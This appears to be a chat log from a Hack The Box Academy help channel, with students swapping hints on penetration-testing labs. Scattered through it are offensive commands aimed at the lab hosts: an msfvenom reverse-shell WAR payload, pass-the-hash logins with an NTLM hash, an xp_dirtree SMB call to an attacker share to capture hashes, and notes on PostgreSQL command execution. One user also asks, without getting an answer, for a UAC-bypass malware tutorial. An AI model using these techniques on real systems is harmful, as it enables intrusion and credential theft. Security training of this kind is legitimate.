crackmapexec, responder, windapsearch, inveigh, kerbrute, several impackey python scripts: secretsdump mssqlclient smbclient mimikatz and a few others i cant remember right now

rpcdump rpcclient

evil-winrm

powerview

well, you need to search for a configuration file, most of the tools that you have mentioned won't be much of help

check the "Credential Enumeration - from Windows" section, there is a tool that you haven't mentioned in it, which will help you

right yea ive noticed but what tool searchs for config files

ok will do

Doing the "Miscellaneous Misconfigurations" Section in the Active directory module.
I have found the cleartext password for mmorgen, but it isn't accepted as the correct answer. Can I get a sanity check?

yea, it is kind of misleading, get the password of the user you have found in the first question

Getting back to this, is there something I need to even after adding a new/existing user to the administrators group to dump SAM using mimikatz?

Try token::elevate first

Hey! I need help for mobile challenge waiting. I'm stuck secret activity. Already tried ghidra and GDB but not able find flag.

Can anyone guide me for the challenge??

It is an active challenge, you can't get a guide, but rather hints if you verify your account #welcome and #rules

Any hints would be apperciated

How to verify??

Hello, where can I download my invoice receipts for payments made?

they are usually sent automatically, however, if you haven't received any you will have to reach out to support

I already have verifed my account.. when joined

@autumn pilot Thank you, i found it, dont know why i totally just spaced snaffler. lmao i hella read through that section like 20 times it seems and your right it was the only on in that section i didnt try. i feel so dumb now lmao thank you tho as soon as i found it my headache instantly started to go away lol

@autumn pilot can you give me some hints regarding challenge?

nope, sorry

Ask best in the channel #challenges

Ah, thanks!

I missed that part

Hey guys I need some help with the os ticket part of attacking common services, I am not able to access my ticket once I create it keep getting access denied

it is simpler than you think, there is something in the section that you can utilize in the exercise

part of data that will help you achieve something

Thanks done it, that was stupid why even mention the other way if we weren't gunna use it 🤣

HINT "What is the FQDN of the host where the last octet ends with "x.x.x.203" . HINT guys i was stuck on it for hours , dont change IP given when you spawn machine , only change subdomain at the end of dnsenum , for example . dnsenum --dnsserver 10.129.???.???(your IP) --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/NEVERCHOSE-top1million-5000.txt ??????.inlanefreight.htb (ALSO DONT PUT THAT . AT THE END OF HTB DOMAIN ) biggest HINT is try DIFFERENT lists in that dir for SAME subdomain , and you will get different results

any one has solved the Attacking Common Services - Easy using || CORE FTP || method i have already solved the lab using || MYSQL|| but wanted to know the other way EDIT :- nvm solved it

Try a different list. A smaller list

hi

I am still stuck with what you talk

Hey people

The best thing to learn is Radio frequency

Good luck

yes stacked queries ie ending the initial statement with a semicolumn followed by attempting to perform another query which in this case is RCE with COPY or RCE with Extensions. i have tried both ways and confirmed the table is created for the first way and the lo_create is successful for the second way. but i am unable to proceed further.

Hello,

I'm stack on Skill Assessment of Using CrackMapExec on the second question:

Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt.

What I get so far:

• Two valid users with their credentials
• Dump the SMB, and I got another creds but didn't work...

Any hint?

have you tried to use a query to search for such things?

in bloodhound

Hello, im in ATTACKING COMMON SERVICES sql databases module and im stuck, im trying to execute subdirs but i no have hacess EXEC master..xp_subdirs '\\10.10.110.17\share\' but if i use dirtree works EXEC master..xp_dirtree '\\10.10.110.17\share\' im tryng to steel hashes with responder but doesnt works, what can i do?

Oh, yes then stacking sql queries is the way to go. Although you can send them individually

are you sure that this is the IP of your tun0 interface?

got it!

did you try using the copy way or through the extensions way?

One of the copy methods. 🙂

something like this? https://medium.com/r3d-buck3t/command-execution-with-postgresql-copy-command-a79aef9c2767

I can assure you that two of the provided commands are working

it could be that might be missing a json file when you imported them

One of those methods maaaaaay work 😉

did you use this to get a shell or just read a file

But I would point you at the HTB Command Execution chapter. WHat you can do to test things is run each command in sequence with an IF WAIT method to get feedback whether the command worked.

Errr. No. Try looking at the example C compiling

But just be careful you're using the correct pgsql server version when compiling. I think the pwnbox has v15 on it

and you'll want v13 (as per the HTB guide)

i tried this few days back. had some issue with this portion INSERT INTO pg_largeobject . already took care of the blacklisted character but still it doesn't insert 1 page based on my validation "SELECT COUNT(DISTINCT pageno) AS num_pages FROM pg_largeobject WHERE loid = 58514"

Im trying to connect to mssql with this mssqlclient.py -p 1433 htbdbuser@10.129.246.163 but i have the next issue [*] Encryption required, switching to TLS [-] [('SSL routines', '', 'no protocols available')] looking on internet i found this post in github https://github.com/fortra/impacket/issues/856 i do what the post says i change ctx = SSL.Context(SSL.TLSv1_METHOD) to ctx = SSL.Context(SSL.TLSv2_METHOD) in my tds.py file 2 times in line 666 and 914 and i update impacket but i have still the same issue somebody could help¿

it would be easier if you just download an older release

how i can downgrade my myssqlclient.py ?

https://github.com/fortra/impacket/releases

im tring to uninstall impacket sudo pip uninstall impacket WARNING: The directory '/root/.cache/pip' or its parent directory is not owned or is not writable by the current user. The cache has been disabled. Check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag. Found existing installation: impacket 0.9.22 Not uninstalling impacket at /usr/lib/python3/dist-packages, outside environment /usr Can't uninstall 'impacket'. No files were found to uninstall. first thell that i have version 0.9.22 then can´t uninstall it

if i run msqqclient says that i have version 0.10

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation```

you don't need to install it

just visit the examples directory and you will see the scripts

i dont understand i donwloand impacket-0.9.15.tar.gz how can i run the mssqlclient of this version ?

it is an archive that contains different files and directories

i dont know how to do it sorry

i do it and now how i run the mssqlclient version of impacket 9.15?

why is runing version 10 of impacket?

https://academy.hackthebox.com/module/188/section/2000

look

Hello! Is the lab in the 'sudo' section for the updated 'Linux Privilege Escalation' module mistaken? The lab doesn't match any of the techniques they taught you in this section

hello, working on the hacking wordpress module, being asked to manually enumerate the folders. i did that. directory listing is enabled, but not able to find flag.txt file. in the 2 folders as mentioned in the content material

if the cotent material thells u the folders will be too easy

ok!

sorry didnt get you. you mean i have to use some other tools to enumerate?

all you need is the contet but you have to think out of the box

I'm doing the final module in the CPTS course - ATTACKING ENTERPRISE NETWORKS. I'm trying to do this module without looking at the answers, I keep running commands I feel should work, but they don't. I look at the walkthru and don't know why what I'm doing wouldn't work but the way they did it does. Is there anyone that can provide an in-depth explanation for a couple examples I have??

can you give me a small hint, been at this for some time now. i have no idea what to do next

I have

Hi I have this credentials on my question ||JMarston:P@ssword!|| but I can’t submit ! -format is (username:password case - sensitive)

which section and module

Password Attack - Attacking AD & NTDS.dit

put the password in single quotes

Doesn’t work

Done , thanks I just copied Pwn3d! credentials from crackmapexec

thank you, can't manage this without your guidance

Got it yet?

Hi everyone, I'm currently in the password attacks module, in the mutation section. I'd like to know if I'll have to wait a long time to obtain the ssh password by bruteforcing it?

Hi how are ya I'm going through the linux fundamentals module and got stuck on this assignment where I need to ssh through vpn and say what's the path to the user's mail. Not only did I not find anything online I also don't understand what finding the "path" to the mail means. Any help?

yeah, finally found it. wpscan was helpful

If you are create a correct rule without delete first 17000 word ya you will wait a long time

Si what is the solution to speed the process pls

Does windows attack and defense module cover ADCS completely? like including ESC4 too. From outside the module I see it mentioning only ESC1 and ESC8

Hey guys, I'm trying to crack a hash file using john, when I sepecify a wordlist to be used, the john tool runs and ends in a few seconds withoud actually cracking, but when the wordlist is not specified the john is running fine and doesn't ends soon, can anyone help me with this, thanks.

when you don't specify any wordlist, john resorts to a default one.

You can see that in the output itself.

hashcat is better (on my opinion)

thanks, yes I do know that, the issue I want to solve is that john doesn't run when I use a wordlist that I choose

I believe it does run with your wordlist, it just doesn't show anything unless it cracks the password

cool thanks

--verbosity=N Change verbosity (1-5 or 6 for debug, default 3)
you can play around with the verbosity to debug if you want

how long is your wordlist you're trying to use? if it's small then yes, it would probably run thru it in literally no time. Try selecting a super long wordlist like rockyou since this isn't john's default wordlist and see if it quits early

No one is talking Iam leaving now.

No. The ADCS is just one section in the module but the module gives you access to the oficial paper released when the vulnerability was discovered and in that Yes, you have access to all types of escalation and persistence through Windows certificate service. The module is great and closes a lot of gaps regarding AD in general

Ah, Thanks for the insight. Also congrats on completing all the modules

hi

How Can I Transfer a zip file From a Widnwos Machine to our linux machine ?

For Ex I want to trasnfer a bloodhound zip file from a windows machine using the Powershell

what accesses do you have to Windows machine is the first question.

AD Admin Local user

Well, there's a lot of techniques you can use from mounting file through RDP, SMB shares, HTTP file transfers

I'd recommend you to go through the File Transfer module, It has everything covered

Can You Give me A Command Using RDP ?

Hi Im in password attack - Credentials hunting in windows in before last question I found || P@55w0rd || to submit but I cant

Nice ! I will check this module

But Now Im sutck on Questions Required to bloodhound

xfreerdp has /drive: argument which can be used

Look it up

Hi, I'm in The Live Engagement - module shells and payloads and i need help please. In the first host, i ||upload the war reverse shell but i don't receive the shell||

@gaunt monolith which question specifically

Too vague, can you send ss or payload you using

I have used the next payload to create the war file: ||msfvenom -p java/jsp_shell_reverse_tcp LHOST=[IP] LPORT=[Port] -f war -o shell.war||

^

you can try unzipping the .war archive to see how exactly the payloads are stored

and see if that helps with your execution.

Hey! I was doing the first question for the pass the hash section, on password attacks, and I have a question. https://academy.hackthebox.com/module/147/section/1638

For some reason, when I try using impacket-*exec or crackmapexec it won't work, but evil-winrm does.

# doesnt work, even if i change to any other like psexec
impacket-smbexec Adminstrator@10.129.122.157 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
# also doesnt work
crackmapexec winrm 10.129.122.157 -u 'Adminstrator' -d . -H 30B3783CE2ABF1AF70F77D0660CF3453

Anyone knows the reason?

Command that works: evil-winrm -i <ip> -u <user> -H <hash>

.\Adminstrator:30B3783CE2ABF1AF70F77D0660CF3453 STATUS_LOGON_FAILURE

Hey! I'm having trouble with question two on Privilege Escalation. https://academy.hackthebox.com/module/77/section/844 I have access to user2, but unsure how to progress.

Got it! 🙂

Before last >> whats default password use when make new account in domain controller

dm me what u were gonna submit

Has anyone had issues with 'Cracking Wireless (WPA/WPA2) Handshakes with Hashcat'?

Following the instructions and still getting this result:

Session..........: hashcat
Status...........: Exhausted
Hash.Name........: WPA-PBKDF2-PMKID+EAPOL

hello all

i want some help with bloodhound

when running it in the module active directory enumeration aand attacks

i do the USING WEB PROXIES module and try to setup ZAP.

The Hud don't work. It don't show. I use the open broter with pre-configoration. and hud is enable but it dont show. Why?

module: active directory enumeration and attacks section : Privileged Access

what error do you get when running it

when running cipher on bloodhound it shows no data

cypher queries?

yes

what query did you run?

you can paste it here

first i run bloodhound ./bloodhound.exe

then i paste the cipher

MATCH p1=shortestPath((u1:User)-[r1:MemberOf1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote1..]->(c:Computer) RETURN p2

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

there's a small syntax error in what you had sent

or maybe not, discord just processed the * to italics in what you sent but. The query works for me

i do the USING WEB PROXIES module and try to setup ZAP.

The Hud don't work. It don't show. I use the open broter with pre-configoration. and hud is enable but it dont show. Why?

https://academy.hackthebox.com/module/136/section/1260

i have this and is saying it is not the right answer

"submit the first word of it as the answer"

more like, submit the word that's actually an word

they removed it

so i guess i canot post it

For good reasons lol

but yeah, just submit what looks actually like a word

done ty

can I get a hand with https://academy.hackthebox.com/module/116/section/1512 Attacking DNS - I don't know what to do to fix the transfer failed running dig

what's the issue?

I think it's mostly my understanding, I haven't managed to get the AXFR zone transfer to work with the subdomains I got from subbrute

Maybe you haven't gotten the right subdomain yet.

subbrute is the way, tho so maybe wait till you get enough

I've found 4

you can send me the list in DM.

Has anyone completed the newly added Logrotate section in the Linux Privesc module? I’ve compiled the binary and it seems to run properly. I checked the options in logrotate.conf and adjusted the payload accordingly. One of the conditions for the exploit to work is that we need write permissions on the log files, but we only have read on /var/log, not sure how to proceed.

Hello every body, please someone know where i can have tutorial tò make an UAC bypass malware?

https://academy.hackthebox.com/module/136/section/1261

why is the revshell not working?

you don't need a reverse shell

yup definitely got it.

Hi guys, for those of you doing 'using web proxy', when you open the proxychain, is it like /etc/proxychains.conf or /etc/proxychains4.conf?****

hey guys, I am completely new to hacking

can someone learn me the bases ?

HTB Academy has everything you need

where can I find it ?

Just search HTB Academy on Google and it should be the first one

ok thanks

Np

Finally !!

who is there

what happend ?

I'm on attacking common services 3rd section haha

Hopefully it's fun module!

Yeah its good ! Specially the assessment labs

anyone already had that problem?

curl ip
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
curl: (7) Couldn't connect to server

how is that command going through proxychains tho, you aren't even mentioning proxychains

Also, you gotta mention the protocol, http:// for curl

proxychains curl http://IP

im using the proxychains curl http://ip

and wdym with that

create a port forward if it is not working

what did you do for port-forwarding?

Oh sure

yeah it worked now lol

thanksss

https://academy.hackthebox.com/module/136/section/1288 File Upload Attacks

any hint please

am able to upload files but not to execute them

nvm i got it

i had to find the extension which is able to execute

no

I am struggling to connect to the database to start the questions for "Attacking SQL databases, Attacking Common Services". Not sure what I am missing here.

I am just confused with how to connect to the target initially

not sure how to authenticate with that user

Probably enumerate and see what port opens first

1433 is open but mssqlclient.py is throwing errors at me

mssqlclient looks to be broken, that may be my issue

can you share the command that you are using?

dm you

ftp> ls -a
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 root root 4096 Nov 10 2021 .
drwxr-xr-x 2 root root 4096 Nov 10 2021 ..
226 Transfer complete

hello i am doing footprint module easy lab section. but i am not sure how to proceed

can somebody help me please?

Where are you stuck and what have you tried?

i connected to ftp

ftp> ls -a
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 root root 4096 Nov 10 2021 .
drwxr-xr-x 2 root root 4096 Nov 10 2021 ..
226 Transfer complete

What port # is that?

6748

I just did an nmap scan on footprinting easy, I don't see 6748 open

Dm me a screenshot of you nmap scan if you want

I don't think it's the /var/log file, it doesn't necessarily need to be that file. The file where logrotate modifies/create can be in a different place too.

Where you able to get it working? All my searches pointed me to /var/log

Yup

It's sitting right inside your home folder

Ok, I'll double check, ty

hello for the hacking wordpress module, username enumeration room, i copied the curl post command from burp, burp is displaying the correct outout, but curl command in terminal is displaying only the headers . how do i get curl to show the html body as well?

curl -i -s -k -X $'POST' , these are the flags being used

I haven't been able to get a shell to be spawned yet tho.

Me neither, that's where I'm stuck as well

I saw that there are no changes to the bash_completion.d directory even when the exploit gets executed

gotta be some small detail we might be missing.

haha

😎

Find a directory that is writable by your user and use file transfer methods in that particular directory.

you should be able to do so with a basic Invoke-WebRequest, refer to file transfer module for more techiniques

You always gotta host the files in your local VM because most of the time (almost all from what I've seen) the labs don't have internet access, so you can't download Internet-available resources to the boxes

I believe it's got to do with the Web-Shell restriction? Was your access a web-shell?

Sometimes WebShell don't do a good job of navigating around, I'd say get a reverse shell whenever possible.

in the hacking wordpress module, skill assessment, i put in inlane.htb in the /etc/hosts file, but that would not work we need to put in inlane.somethingelse in the /etc/hosts file, now why did inlane.htb not work , why am i forced to put inlane.l**** in the /etc/hosts file ?

I'd not agree to that, they both work different lol

Ah if you mean it like that, yes. Mostly yes you can 🙂

To be more detailed, some advanced webshell allows you to move around which makes you think you're navigating like in a reverse shell but they just process your inputs on client side and append the path automatically to the payload, to seem like you're navigating to places.

Q / Run Snaffler and hunt for a readable web config file. What is the name of the user in the connection string within the file?

I get the name but I can't solve the Question

which module is this?

ACTIVE DIRECTORY ENUMERATION & ATTACKS -> Credentialed Enumeration - from Windows

I found the answer

Ty

Ah cool.

Have anyone tried this ?

Hmm, i couldn't find anything

Using rockyou-50.txt as password wordlist and htbuser as the username, find the policy and filter out strings that don't respect it. What is the valid password for the htbuser account?

Im stuck in this module: broken authentication. someone could help me?

any hints , im stuck :
https://academy.hackthebox.com/module/112/section/1079

??

Hi, in this module "DNS Tunneling with Dnscat2" how can I transfer dnscat2-powershell.git to the victim machine?

You can use a python simple server

Thanks❤️

Anyway I recommend you to do the "File Transfer" module

Anything I can do to fix this? (sudo apt install libc6 doesn't work)

Is in the pivoting - SOCKS5 tunneling with chisel section

So I’m considering to get the yearly subscription in hackthebox academy

When I get this , do I have direct access to all the modules ?

Everything up to tier 2 I think

Yea does that mean I don’t have access after that ?

You don't have direct access to tier 3 and upwards

English is not my native language I’m confused lol

you can use the cubes you earn to buy those modules

Yea buttt I don’t think the cubes are enough lol

I’m at work staring at this subscription instead of working

@dapper star gotta give it to you , I love your bio lmao

Hahaah thanks 🙂

there is a compiled version on github in case you want to skip the compilation part

Can't find it, do you have a link? Is it in the normal github repo?

#modules message

❤️ thanks

I am doing the network enumeration with nmap module but in the firewall bypass practice if I do it from my machine it doesn't work but from the pwnbox it does. Why is this happening?

It's prolly with how packets sent and received, usually firewall audits would be performed inside internal networks, Not through VPN. I guess, it's the same case here.

I am on shell and payloads module.
I am stuck at 50064.rb the exploit is given error.Error is method ' split ' for nil:nilclass

are you using with with msf ?

Yes

Do what exactly? What record are you requesting specifically?

@sly kelp ?

@rustic sage Can you verify yourself and send screenshot of what options you're setting to execute the payload?